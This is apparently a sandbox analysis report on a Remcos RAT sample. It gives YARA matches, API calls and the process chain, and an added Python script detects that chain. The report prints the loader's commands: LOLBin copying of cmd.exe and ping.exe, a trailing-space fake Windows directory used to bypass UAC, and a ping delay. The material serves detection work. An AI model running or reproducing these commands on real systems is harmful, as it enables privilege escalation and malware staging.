Source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@34/10@9/4
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_0467798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 8_2_0467798D
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 17_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 17_2_0041798D
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 17_2_051386A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 17_2_051386A8
Source: C:\Users\user\Desktop\AWkpqJMxci.exe | Code function: 0_2_02887FD2 GetDiskFreeSpaceA, | 0_2_02887FD2
Source: C:\Users\user\Desktop\AWkpqJMxci.exe | Code function: 0_2_0289AD98 CreateToolhelp32Snapshot, | 0_2_0289AD98
Source: C:\Users\user\Desktop\AWkpqJMxci.exe | Code function: 0_2_02896DC8 CoCreateInstance, | 0_2_02896DC8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_0467B539 FindResourceA,LoadResource,LockResource,SizeofResource, | 8_2_0467B539
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_0467AD09 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, | 8_2_0467AD09
Source: C:\Users\user\Desktop\AWkpqJMxci.exe | File created: C:\Users\Public\Libraries\PNO
Source: C:\Windows\SysWOW64\SndVol.exe | Mutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
Source: C:\Windows\SysWOW64\colorcpl.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-SKG82E
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: AWkpqJMxci.exe  ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  File read: C:\Users\user\Desktop\AWkpqJMxci.exe
Source: unknown  Process created: C:\Users\user\Desktop\AWkpqJMxci.exe "C:\Users\user\Desktop\AWkpqJMxci.exe"
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rlyzsazB.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\AWkpqJMxci.exe /d C:\\Users\\Public\\Libraries\\Bzaszylr.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif  Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: unknown  Process created: C:\Users\Public\Libraries\Bzaszylr.PIF "C:\Users\Public\Libraries\Bzaszylr.PIF"
Source: C:\Users\Public\Libraries\Bzaszylr.PIF  Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: unknown  Process created: C:\Users\Public\Libraries\Bzaszylr.PIF "C:\Users\Public\Libraries\Bzaszylr.PIF"
Source: C:\Users\Public\Libraries\Bzaszylr.PIF  Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
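The process chain recorded above is the detection-relevant part of this report: esentutl copies cmd.exe and ping.exe to alpha.pif and xpha.pif under C:\Users\Public, the renamed cmd.exe creates "\\?\C:\Windows " and "\\?\C:\Windows \SysWOW64" (the \\?\ prefix keeps Win32 from stripping the trailing space, so the directory differs from the real C:\Windows only by that space), the renamed ping.exe is run as a 10-second delay, and the staging directories are removed afterwards. The Python below is an added example and is not part of the Joe Sandbox report or of any vendor rule set: it runs four command-line rules over records constructed from the report's own "Process created" lines. The record layout, function names and rule names are this example's assumptions, and the Win32 normalization helper is an approximation (trailing spaces and dots per path component), not a reimplementation of the kernel's path parser.

```python
r"""Detection logic for the staging chain in this report: LOLBin copies via
esentutl, a trailing-space directory created with the \\?\ prefix, a loopback
ping loop used as a delay, and .pif execution from C:\Users\Public.
Added example, not part of the Joe Sandbox report; records are constructed."""
import re
from typing import NamedTuple

LONG_PREFIX = "\\\\?\\"                     # literal \\?\ : skips Win32 path normalization
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
PING_SLEEP = re.compile(r"(\S+)\s+127\.0\.0\.1\s+-n\s+(\d+)", re.I)

class ProcEvent(NamedTuple):
    parent: str
    image: str
    cmdline: str

# Constructed from the report's command lines (not an exported log); doubled
# backslashes are kept exactly as the report prints them.
EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\esentutl.exe",
              r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\esentutl.exe",
              r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Users\Public\alpha.pif",
              r'C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Users\Public\alpha.pif",
              r'C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"'),
    ProcEvent(r"C:\Users\Public\alpha.pif", r"C:\Users\Public\xpha.pif",
              r"C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Users\Public\alpha.pif",
              r'C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64'),  # unterminated quote, as printed
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),         # benign control
]

def tokens(cmdline):
    """Split a Windows command line into arguments, tolerating an unbalanced quote."""
    return [q or u for q, u in re.findall(r'"([^"]*)"?|(\S+)', cmdline) if q or u]

def clean_path(tok):
    r"""Drop a \\?\ prefix and collapse the doubled backslashes from the report."""
    if tok.startswith(LONG_PREFIX):
        tok = tok[len(LONG_PREFIX):]
    return tok.replace("\\\\", "\\")

def win32_normalize(path):
    r"""Approximate Win32 normalization: trailing spaces/dots are stripped from each
    component, so "C:\Windows \SysWOW64" collapses onto "C:\Windows\SysWOW64".
    With the \\?\ prefix the kernel skips this step, which is how the loader could
    create a directory that differs from C:\Windows only by a trailing space."""
    return "\\".join(p.rstrip(" .") or p for p in clean_path(path).split("\\"))

def basename(path):
    return clean_path(path).rsplit("\\", 1)[-1].lower()

def flag_value(t, flag):
    """Argument following /flag (case-insensitive), or None."""
    low = [x.lower() for x in t]
    return t[low.index(flag) + 1] if flag in low and low.index(flag) + 1 < len(t) else None

def rule_lolbin_copy(ev):
    """esentutl /y <src> /d <dst> copying a System32 binary under a new name."""
    t = tokens(ev.cmdline)
    if not t or basename(t[0]) not in ("esentutl", "esentutl.exe"):
        return None
    src, dst = flag_value(t, "/y"), flag_value(t, "/d")
    if src and dst and clean_path(src).lower().startswith(SYSTEM_DIRS) and basename(src) != basename(dst):
        return f"{basename(src)} copied to {clean_path(dst)}"
    return None

def rule_trailing_space_path(ev):
    """A path argument that Win32 would normalize differently (trailing space/dot)."""
    for tok in tokens(ev.cmdline):
        raw = clean_path(tok)
        if ":\\" in raw and win32_normalize(raw) != raw:
            return f"{raw!r} normalizes to {win32_normalize(raw)!r}"
    return None

def rule_ping_sleep(ev):
    """Loopback ping loop as a delay; matched on arguments since ping.exe was renamed."""
    m = PING_SLEEP.search(ev.cmdline)
    return f"{basename(m.group(1))} 127.0.0.1 -n {m.group(2)}" if m else None

def rule_public_pif(ev):
    r"""A .pif executing from C:\Users\Public (renamed system binaries in this chain)."""
    img = ev.image.lower()
    return f"image {ev.image}" if img.startswith("c:\\users\\public\\") and img.endswith(".pif") else None

RULES = {"lolbin_copy": rule_lolbin_copy, "trailing_space_path": rule_trailing_space_path,
         "ping_sleep": rule_ping_sleep, "public_pif": rule_public_pif}

def scan(events):
    """(event index, rule name, detail) for every rule that fires, in rule order."""
    return [(i, name, detail) for i, ev in enumerate(events)
            for name, rule in RULES.items() if (detail := rule(ev))]

if __name__ == "__main__":
    for i, name, detail in scan(EVENTS):
        print(f"[{i}] {name:20} {detail}")
```

The trailing-space rule deliberately works on the difference between a path and its normalized form rather than on the literal string "C:\Windows ", so it also catches the same trick against other directory names; the ping rule keys on the arguments because the image name (xpha.pif) tells an analyst nothing. The benign conhost record at the end produces no hits, which is the check that the rules do not fire on every child of cmd.exe.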
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Section loaded: version.dll
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Section loaded: url.dll
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Section loaded: userenv.dll
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Section loaded: netutils.dll
Source: C:\Users\user\Desktop\AWkpqJMxci.exe  Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
